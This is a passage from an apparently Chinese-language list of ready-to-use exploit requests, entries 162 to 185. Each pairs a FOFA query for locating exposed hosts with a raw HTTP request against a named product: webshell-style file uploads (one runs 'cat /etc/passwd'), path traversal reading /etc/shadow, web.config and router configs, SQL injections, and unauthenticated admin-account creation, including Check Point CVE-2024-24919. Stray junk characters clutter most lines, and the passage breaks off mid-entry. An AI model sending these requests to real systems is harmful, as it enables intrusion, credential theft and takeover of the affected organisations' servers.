<UploadResume xmlns="http://tempuri.org/">& ?/ t& }4 I9 x! I+ K3 {
<ip>1</ip>: L8 K4 B& O9 Q( Z2 o$ ~
<fileName>../../../../dizxdell.aspx</fileName>* c- X7 H7 w- J! O k. W
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
g1 F: X2 V+ ^. ]- W<tag>3</tag>
2 }* J" t% R/ q0 `. p) p) g</UploadResume>$ B, i5 j7 K1 j7 z% |
</soap:Body>" {! n0 z2 }1 O
</soap:Envelope>
) W# k. ]" ^5 ?; [; ?2 m8 V) M, I% s! O: U6 }! s
/ b5 I, i& \% p& L( a3 i
http://x.x.x.x/dizxdell.aspx. z6 b& H7 f/ U L4 H }
: j1 n' s3 }/ F! K162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传+ h+ r$ K% V6 e# k8 l% p: M
FOFA: app="和丰山海-数字标牌"
6 J- U* j. t# ?; c1 ]6 F- nPOST /QH.aspx HTTP/1.19 \7 D$ I v. x+ x8 N5 l
Host: x.x.x.x6 a3 R0 J3 y8 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0" C. i3 ^3 ~+ l- L# ~
Connection: close
+ x6 u- h: H. O2 UContent-Length: 5838 T6 R6 o) |; A3 {+ E7 b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
! E5 t- i" V, j6 UAccept-Encoding: gzip9 r( Y7 ^8 Y" b7 c; i2 m
# Q8 S) ^7 b" R$ \
------WebKitFormBoundaryeegvclmyurlotuey7 N2 V* c" r/ o0 [) O' r* l
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
; w% T* H( m" }% `/ y; f1 c SContent-Type: application/octet-stream
6 W. X* E0 v9 u- `3 u" F! |7 a. g2 Q9 i4 n5 j( z
<% response.write("ujidwqfuuqjalgkvrpqy") %>$ x& a7 N# U( |& R) P
------WebKitFormBoundaryeegvclmyurlotuey, }, k1 M; Z2 G. w, L2 ?7 I8 S: h
Content-Disposition: form-data; name="action"
3 \) b9 {$ w+ Y; j9 ^7 G1 W7 a1 ^! [
! e6 f1 H2 H1 Hupload
* [, G6 V7 T6 a2 c------WebKitFormBoundaryeegvclmyurlotuey7 T9 ]1 A5 X" k0 A
Content-Disposition: form-data; name="responderId"
. h! B+ }$ k; v4 S* z3 A$ b) t7 s" K. e% [ B
ResourceNewResponder
! [& z0 H/ f+ l( w- \# G------WebKitFormBoundaryeegvclmyurlotuey5 J$ Q0 \3 b/ H( s
Content-Disposition: form-data; name="remotePath"1 t' c6 i( I2 {
8 Y% M4 P' h3 V$ P; a! @/opt/resources6 k0 Y% }+ S; H) |
------WebKitFormBoundaryeegvclmyurlotuey--1 {- t; c1 o5 |: ]. ?2 J E
9 j. H" D# u/ E9 G0 C1 C3 ?
: s: K. l) V+ c& o2 P2 O3 _' X
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
/ o0 G2 ? w& z2 a( Z, V8 o
$ ?3 b8 q* h6 _" @163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
! p3 w3 a3 |2 u, w4 NFOFA: icon_hash="-795291075"
& R1 j& V1 J" N+ \7 {& x; dPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
: V5 \- g- p& W; z5 [Host: x.x.x.x
5 O4 K$ ~& I! p) ]* C$ @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
0 i& v2 ^2 E: t7 RConnection: close+ L, x8 M( O f: I3 U6 K
Content-Length: 293# P( i$ h4 b$ J1 }( r, [: k) I. s
Accept: */*0 @7 P# _% Y/ J: w o! O
Accept-Encoding: gzip, deflate
. I2 h8 g; |1 {% ]; R# a2 P/ RAccept-Language: zh-CN,zh;q=0.9& T0 j R0 ]1 q: N- a/ ~
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
/ ^5 K W4 ?- t& E% e/ O# M4 q
# c) P8 H- p& D6 N------iiqvnofupvhdyrcoqyuujyetjvqgocod
/ H* @1 m- p+ t2 V& `0 N7 g) {Content-Disposition: form-data; name="name"# L" w+ Z" | r! K) [3 \
6 }$ s& H$ X( S/ D# S1.php% F. n, `+ u) X. Q
------iiqvnofupvhdyrcoqyuujyetjvqgocod; ^. f7 V9 d6 H, o# z% u
Content-Disposition: form-data; name="upfile"; filename="1.php"
0 `# g" ^4 H3 w; U2 |: \( ^! iContent-Type: image/jpeg9 Z/ c8 c B! B& B& H' E1 l5 E
/ V( _; O) B( F. P9 [rvjhvbhwwuooyiioxega
4 n7 x/ I; h$ V5 v7 S------iiqvnofupvhdyrcoqyuujyetjvqgocod--$ y) \- x, o6 E8 m
, R. G( Q2 n$ Y& \8 n; I5 F
2 ?+ w ?8 ~9 A+ C& ~: v- T1 p
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
1 q$ T+ @; m4 x8 H' |& y% @) q' @FOFA: title="智慧综合管理平台登入") t, T8 m; d/ i' {$ m
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.16 r0 R" r2 Z4 H
Host: x.x.x.x
' v4 U9 e f! f/ L! k+ sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.02 J* x! O: |2 ]) ?" Y
Content-Length: 288
. z7 g1 _! ~! x; u3 PAccept: application/json, text/javascript, */*; q=0.01! M [" [- r* Z) o0 g8 y/ |2 ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
3 A' ~8 ]; d+ dConnection: close
- R# y6 R+ r$ HContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl8 b) C% f/ o8 t3 t! ]6 l1 @
X-Requested-With: XMLHttpRequest
: D( {4 x7 |( K X# h6 L; aAccept-Encoding: gzip2 z( ]0 H7 c% p5 b/ ]' w
! M+ }7 z) h0 q4 k: q------dqdaieopnozbkapjacdbdthlvtlyl" b. h% @% P( r8 c9 z; Z4 l8 J
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
; _7 a7 }- w5 t" yContent-Type: image/jpeg. z5 t% j0 K( @6 t3 t; I D4 p
9 F/ j8 R7 t. Y$ {- _7 C<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>7 B4 T9 e- J" c) r/ \( N0 i
------dqdaieopnozbkapjacdbdthlvtlyl--
/ I4 O3 w* V# p; L' p8 d: n) ^. k% r
& [3 D8 L7 T. l" f8 ihttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
3 f: C5 G5 k. X3 y
- k& S* j7 e. X7 ]165. OrangeHRM 3.3.3 SQL 注入. `. q$ I" v, E' w+ n
CVE-2024-36428
* `: E: Y9 S HFOFA: app="OrangeHRM-产品"$ a7 O! r1 B: x/ x$ X7 C
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))" N4 |) c& d! u( N8 ^( k
( Q" x* [; [& E1 {; ^( J$ l+ m6 d6 e( _- ^5 W( ]) O9 W$ c
166. 中成科信票务管理平台SeatMapHandler SQL注入( i0 k' b. |9 \9 a* z" B6 [- d8 J
FOFA:body="技术支持:北京中成科信科技发展有限公司"
- q( E0 K" D9 EPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1- W* q r! O% s: @: l; n- S3 t. ^6 f
Host:
, O; f: ~; c3 ^+ wPragma: no-cache7 Z+ C* r2 e/ I: m0 U0 C$ k- _7 X
Cache-Control: no-cache
: M* t' T" _3 JUpgrade-Insecure-Requests: 1
( ]. A( y0 M$ s3 }+ X! z: yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.361 ?/ ?6 Z0 h. P* F0 M6 |$ j# x' U- Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- j$ I: F! ~' V& o6 B( E* Y" K7 Q' C
Accept-Encoding: gzip, deflate
2 m2 d5 V ]' l: r) [9 l4 hAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
9 c9 X9 }! F9 _5 e b$ t+ H5 xCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE! C" r# u7 Z; w) {3 u6 g4 P
Connection: close# O, v; K, F* Z. Y! h8 @' H
Content-Type: application/x-www-form-urlencoded
9 V! x7 J$ \% K! {, s- E. nContent-Length: 895 |5 K8 D, N/ m/ z- q& F* o/ y
, f- {3 z G) d8 _5 d$ y" F# V$ ^
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE& x" A# @7 s6 P& U( E4 ? M
; i, L Q2 ?( `/ Y
3 `! t- y$ x. W' G167. 精益价值管理系统 DownLoad.aspx任意文件读取( }% U2 l+ c( F: T
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
; s+ M9 |) g. PGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1* Z1 R! d. ?; u
Host:# W6 L' f8 s. T, x8 g6 l( E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 a2 x6 N1 M$ q0 |) X ` K( Q ~8 ]
Content-Type: application/x-www-form-urlencoded
g' |# O8 H5 |* u0 YAccept-Encoding: gzip, deflate
: n8 `0 \3 w# ]9 S2 ~( E3 s5 |4 YAccept: */*
: r) x5 E5 c" M$ u& ?# CConnection: keep-alive/ |* |+ y% O" ^7 W
j/ }0 v& i" A6 D! {5 x6 Z& Q5 a! V, @4 r" G
168. 宏景EHR OutputCode 任意文件读取
3 v1 H3 O/ D$ |) `6 _FOFA:app="HJSOFT-HCM"$ r+ o& Z! g; T. G# f
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1; s) U# E. i* W3 N& t% Q4 @7 k7 B3 I
Host: your-ip
" p" \! v1 _7 l/ i* ]1 |, }, k7 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
" M( |& P/ e4 p3 ?Content-Type: application/x-www-form-urlencoded5 F8 \- t5 b2 k, H4 I
Connection: close
# N7 f: }% [, E0 T. j- I5 p" L' J, c; H; z6 w" L
6 o7 q, t- e) \9 r; V0 Z1 Q* a" D, e8 |5 }* }
169. 宏景EHR downlawbase SQL注入
7 D4 F7 x3 X1 H4 b1 K1 [: ?; RFOFA:app="HJSOFT-HCM"7 M( F# e C& w4 h; p1 S
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.11 _ A! T% g% c6 M1 @7 E
Host: your-ip
& u6 X/ W0 K: U4 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 h8 F7 y* L9 V; ~# [
Accept: */*
% H h; }. }! D- FAccept-Encoding: gzip, deflate" D4 i7 w4 F1 k5 t
Connection: close* g) `! g2 a. i
( R1 Y: ?: Q4 V2 H2 \% B1 e
1 W1 Y, `8 J7 P
/ b, g% U0 h$ d7 ^5 `170. 宏景EHR DisplayExcelCustomReport 任意文件读取
; q' H2 C5 m9 Q( b4 z7 V. gFOFA:body="/general/sys/hjaxmanage.js"
6 M; Y L( v# m' Z; n9 DPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
; [# p5 ]4 g& O% KHost: balalanengliang/ P* U/ }: `/ u6 \8 V! g/ P
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ o0 K1 ^6 R! x+ w7 T* jContent-Type: application/x-www-form-urlencoded
8 J- q' _/ f; ~5 \3 z2 J$ Z$ \1 M
% n+ a g7 i" x" C% V! Vfilename=../webapps/ROOT/WEB-INF/web.xml
8 l+ o$ U0 Z* k+ g) r1 J9 ?
; l- {1 F5 Y" P* P7 Z2 M+ N
5 F$ G( r' s( W$ U! V171. 通天星CMSV6车载定位监控平台 SQL注入- g/ P* w' F5 l+ t2 {( ]( a
FOFA:body="/808gps/"5 Q# O2 W% v; `0 W) D/ u3 O" s1 n
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
' Q! m |/ j1 [0 t- ~6 JHost: your-ip
& A( ^1 V: ?# d/ F4 F( VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
# n% p6 n1 O" _- J0 \' b+ pAccept: */*! S; a7 C- G9 g/ a: E7 N Q4 A, _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ R* K- p4 H( ?9 ^# U8 eAccept-Encoding: gzip, deflate' P1 a/ m: i7 ~% \" H) I0 c3 S1 l
Connection: close
8 B* G2 r) A0 R- L! V4 a( ?7 w" N" o' K8 h' V4 l J4 T% z
1 i! w% O/ u' q0 C
% _' E+ {6 B+ [, j3 o
172. DT-高清车牌识别摄像机任意文件读取! w# `; E' F& {
FOFA:app="DT-高清车牌识别摄像机"
" _3 H7 {9 u( n9 tGET /../../../../etc/passwd HTTP/1.1% m/ B/ R2 F. \
Host: your-ip
& b0 ~$ P. q! EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. c( L& ?# k: F
Accept-Encoding: gzip, deflate8 s Z: T5 `) ~% `" ?
Accept: */*0 I' {# C/ s2 D' r/ N1 d) y
Connection: keep-alive
/ l0 I7 f2 F2 N7 \- `
7 u* G# x; z" m! B! a! j
; z$ v! C' |9 v* m8 Y' i) z: Q2 o1 k# K$ O9 f" i( U7 `1 Q% c
173. Check Point 安全网关任意文件读取
4 d/ W5 D+ s9 P: K6 ?# Q* oCVE-2024-24919
# m/ Y& X* G% o! V# \. RFOFA:app="Check_Point-SSL-Network-Extender"! e8 H' G/ G. g- |
POST /clients/MyCRL HTTP/1.10 y9 w9 x% `* g4 f- ?. f
Host: your-ip* i9 Z4 c- L8 W
Content-Type: application/x-www-form-urlencoded3 ?& E5 y+ |% k9 H6 d$ c
S: R$ O. N: R h3 S
aCSHELL/../../../../../../../etc/shadow& P* |0 O" N# S8 [
# X: o( t; l# H7 E
" Q" d" x0 o7 D/ I
% d$ f8 A7 Q; v* D174. 金和OA C6 FileDownLoad.aspx 任意文件读取& X' l: P* ~, T% q: r+ F
FOFA:app="金和网络-金和OA"
( ]! M# z' B5 ?4 a: m4 q" ZGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
& q7 {$ O3 N% w" t& O2 ^8 |Host: your-ip
. e3 t) e/ _3 B2 K7 g: JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% N/ Q6 _$ z4 x( `9 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
c( c1 I8 F/ f7 t' LAccept-Encoding: gzip, deflate, br7 `+ B' j+ w- ~0 q" @: k4 h- [
Accept-Language: zh-CN,zh;q=0.99 F, Q0 ~ {, M8 u i! I5 ~
Connection: close
3 F. e3 Z% P7 i p% F+ z8 S( q3 V3 G; E, G/ l4 N3 b' J9 N2 y
) Z+ k9 ?* T4 d/ `6 g- P. c( C. M1 H1 _8 d H
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入9 x u" q$ `! p2 S7 ?6 G
FOFA:app="金和网络-金和OA"4 S0 W- X* e2 q0 x
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
2 N8 E0 N2 o* I( lHost:6 m/ x5 s7 v7 ]0 o5 X
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ j! \% H( j. h' n2 P0 s9 Q; cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 a# k+ {5 z* X5 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 G0 h5 m3 D+ s! Q2 d9 R- Y
Accept-Encoding: gzip, deflate
7 Y' Q" N) F3 [/ q8 g/ E6 cConnection: close
$ t" R& v8 F% P5 H y& bUpgrade-Insecure-Requests: 15 U2 Y* i5 E* g3 A: n7 }, l
, z. u; N% m, u: g/ D
# s& n* v- ]: u5 x$ g+ J+ `$ C176. 电信网关配置管理系统 rewrite.php 文件上传
# O% H: f' k4 f; P5 tFOFA:body="img/login_bg3.png" && body="系统登录"; [" H$ R% m/ S9 t9 J5 |; Z
POST /manager/teletext/material/rewrite.php HTTP/1.1
5 E! \/ F8 r1 T/ {3 ~9 ?Host: your-ip
h9 G* [5 J; k& v8 @/ }0 V6 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0, B7 G# v6 C9 w# i
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT* ^( n# y5 {0 Z) _: c+ b
Connection: close
3 D \3 ^. n3 t* J
- u S3 s+ {3 m9 Y/ x+ l------WebKitFormBoundaryOKldnDPT
- y2 }# i6 _8 P7 d! AContent-Disposition: form-data; name="tmp_name"; filename="test.php"0 w3 a7 c) o1 S9 I) Y$ g( L
Content-Type: image/png
2 V9 _( Y( f7 V/ S* l$ K% e3 z1 L$ X / P9 W$ a |% ~2 B5 N7 K. e
<?php system("cat /etc/passwd");unlink(__FILE__);?>
( g$ J z2 M3 H& l' [$ t------WebKitFormBoundaryOKldnDPT
; b n7 `# z; i2 R E+ [$ e c) O" C6 nContent-Disposition: form-data; name="uploadtime"- ]8 i, H% j$ E B: I
& X" I9 c3 v2 j0 F* }$ H
2 T9 Z) ~0 k7 O) N7 Y------WebKitFormBoundaryOKldnDPT--
; u6 O/ w! A, V, r/ f( C, M
7 h' t7 w3 s+ L/ f3 ]) ], c$ g# _( W+ x$ O7 m
8 w9 @8 `( l% }4 b. x177. H3C路由器敏感信息泄露
" J6 U, X) i1 d% \7 H" C/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
- l+ t4 a r* r8 }/userLogin.asp/../actionpolicy_status/../M60.cfg& t) O4 Z; S9 L C. k+ \
/userLogin.asp/../actionpolicy_status/../GR8300.cfg& `" Z: K" _, X; [5 b' b( x
/userLogin.asp/../actionpolicy_status/../GR5200.cfg: |9 t9 k& C# e- f1 P
/userLogin.asp/../actionpolicy_status/../GR3200.cfg$ n0 _0 |, K2 s' U1 A# [5 _
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
! C6 ~1 _( g5 z' C7 b- L/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
2 G0 b* n7 i. v) M3 t1 I# _/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
' _$ l6 L2 X2 y6 v c: s8 V2 o/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg, s4 e% ]9 ]. ]+ r
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg; W# Y* n, Y3 s
/userLogin.asp/../actionpolicy_status/../ER5200.cfg9 t1 q' b6 E" u
/userLogin.asp/../actionpolicy_status/../ER5100.cfg% F7 S3 C: ^. f1 Q3 V
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
2 x9 L1 m$ B. b/userLogin.asp/../actionpolicy_status/../ER3260.cfg
4 w; E# V% W: F7 o/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
1 F$ M, T C2 o6 b' |' c. s$ o- z+ E/userLogin.asp/../actionpolicy_status/../ER3200.cfg' }- |9 L- M- x
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg8 r# ^3 |9 ~) r5 K7 v( `
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
; \; _6 w! Y0 a- x/ B( o/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg9 Y/ w6 z( } l
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
' I( f; f' _% C. @! y/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg G4 E" I& E2 v0 Q
/ m) x u7 X: I: E/ y8 Q
3 i8 R/ {& F# [! t- M- q: ?178. H3C校园网自助服务系统-flexfileupload-任意文件上传
6 z! i: U8 _, L6 r- A9 ~! cFOFA:header="/selfservice"
" U0 N( f( S% e* @+ TPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
1 H7 s$ F1 B8 \7 q2 {9 |Host:' v& A8 K: D6 X# [& J6 B4 e1 V5 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
8 @) o& {% I' |/ |. |5 \- H* bContent-Length: 252, b" h; s% d# {0 M& m9 B
Accept-Encoding: gzip, deflate
8 d& L$ ~; x1 R' J2 ^# }Connection: close
: k* Z( t* j- p& VContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
. U, x- v6 G2 H) t-----------------aqutkea7vvanpqy3rh2l
2 q# i& v3 g6 R, F4 u! q; o6 kContent-Disposition: form-data; name="12234.txt"; filename="12234"( Y0 r7 \9 n2 s J( U+ F
Content-Type: application/octet-stream
, f: ]4 [; y3 yContent-Length: 255
9 h+ {; [% A, A m4 m' v* ]
3 O9 l5 a# [8 Y12234
) D2 w8 ^2 U3 W! |6 g8 B2 {-----------------aqutkea7vvanpqy3rh2l--5 @8 K+ i$ i! e2 w7 R
3 E& T- S1 D# w Q' T0 X
7 i5 d1 F" I0 \ qGET /imc/primepush/%2e%2e/flex/12234.txt
# Q# I+ Q3 G8 K4 g9 }" p8 p" h( U+ P4 e4 m
& q' ?6 E6 h1 }& F
179. 建文工程管理系统存在任意文件读取
8 b+ ]/ W; W" I( ^' o% B# fPOST /Common/DownLoad2.aspx HTTP/1.1
& e, r- n4 {8 D. ~( Z d. VHost: {{Hostname}}
" O& ?! q( L% B2 m" `Content-Type: application/x-www-form-urlencoded8 @( {& N) z" \. f8 |0 i
User-Agent: Mozilla/5.0
}; i- R# O* @8 @/ n* D4 _
6 \. z- I% A: A$ I; o3 vpath=../log4net.config&Name=
% M7 D7 t& P# k7 @) f3 @6 _# D/ E" h; p( H( R% \; `
2 Q; C% ^# P9 ^180. 帮管客 CRM jiliyu SQL注入, J0 e: w$ r2 L4 p; P M- w/ c) u
FOFA:app="帮管客-CRM"
( `+ `7 H+ P) D3 f6 i8 Y# Q) zGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
3 H/ \ |0 X; h# AHost: your-ip
, z! S( O0 J$ N- _: @. B3 i% c$ L" HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 U" v( m; M8 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 \3 ~8 N1 M+ Q9 c9 p5 O9 }Accept-Encoding: gzip, deflate. e3 v `2 E$ O* N) k
Accept-Language: zh-CN,zh;q=0.9
) j S2 k6 r9 B! G: UConnection: close# Y+ m3 G9 N, n/ `1 l* o2 f
6 ^ D( A; N7 f/ X: W# m i/ L
/ ~' y z' F( q. ] @ o9 N/ g& B181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入$ N9 B' W* a( n$ k. d' [
FOFA:"PDCA/js/_publicCom.js"
$ T; }. F& S+ sPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
, ~: w7 X/ V% GHost: your-ip9 d- h3 F6 @& h# C* Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36) M+ _* [$ n- c! H) Z; I. a, m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* h$ D; {8 K/ r% n) G/ r( a% B
Accept-Encoding: gzip, deflate, br' k" l. U( J% R
Accept-Language: zh-CN,zh;q=0.9" f2 _- k/ O% ]' O" c5 g1 D' k
Connection: close& T* j8 h# e G% s8 Z
Content-Type: application/x-www-form-urlencoded3 O- V0 Q+ H7 ^9 S6 `$ z. I" y
0 Y0 a' A$ L" l8 ~& @2 J
9 w: @. ^2 |8 f4 D# r
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20) s# [/ j2 q- r
0 @! I0 e' o6 r. m$ _
1 n; l; I4 Y3 T% y4 V" G
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
1 M- d! Z3 a1 m/ qFOFA:"PDCA/js/_publicCom.js"
+ v8 S' s* _/ YPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1" a/ }) s% d6 Z, C6 P4 Z1 z
Host: your-ip
3 o- `" }5 K3 p4 v0 @& p, l* N4 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
" o* S; z, y. y J( JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- D! D8 {. C3 P. |) _Accept-Encoding: gzip, deflate, br
. E/ S2 `0 ]8 O- }6 nAccept-Language: zh-CN,zh;q=0.9
8 ]* I; f; K7 z5 L) mConnection: close3 S. Q8 i4 s9 \" G
Content-Type: application/x-www-form-urlencoded" T3 `+ |, C- G. |" j
: e" @0 c) O+ n3 z6 s
" X% w6 v( V, n" Y+ v6 \
username=test1234&pwd=test1234&savedays=1
( r% n2 U6 E& F9 {7 N4 t6 m6 [7 C6 t3 G) z/ m
( N) V$ t2 v7 Q7 s+ f183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
3 u+ k; C- @+ X( PFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
2 i) o7 O9 ?* rGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1& R6 Z. n% n( q9 L, ~
Host: your-ip
# C2 _" y H# P. UUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36. A" B. b9 |8 t8 f8 E' j4 [ Q* }; W
Accept-Charset: utf-8
" Q3 {8 ?" a' Y e6 TAccept-Encoding: gzip, deflate: A) [7 O! | w' t3 v d9 }0 K
Connection: close
, e6 @8 o: D. g& q/ f
# |; q, U" o* ?: {/ I
0 }( G1 i+ M" Q W184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
" O1 v: X) q4 x" J% i7 S& m3 g+ c% nFOFA:server="SunFull-Webs"
$ d" @$ T+ k* q# ^8 f& L$ @POST /soap/AddUser HTTP/1.1
+ a- s) q: b, T. H# ^& {% [Host: your-ip5 L2 h& S' ^) h" t+ }
Accept-Encoding: gzip, deflate% v( D! o9 Z4 {4 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
- }! ]; B4 q3 S7 C5 T' zAccept: application/xml, text/xml, */*; q=0.01
( ~& a. w" x2 w2 w1 S4 SContent-Type: text/xml; charset=utf-8
9 b7 t p# ]0 e0 ?1 A3 J* RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 }0 R" J$ ]3 G' R$ T; j
X-Requested-With: XMLHttpRequest: u% N3 t7 s7 V7 e
9 a/ f& G0 F, y$ G' W
- g. k8 a6 x. ~* Einsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')9 `6 T; W4 m# f3 v/ U
6 x" M3 A) e7 A7 B( \4 `- P/ E: o8 [" y7 F- R6 D9 `% g
185. 瑞友天翼应用虚拟化系统SQL注入
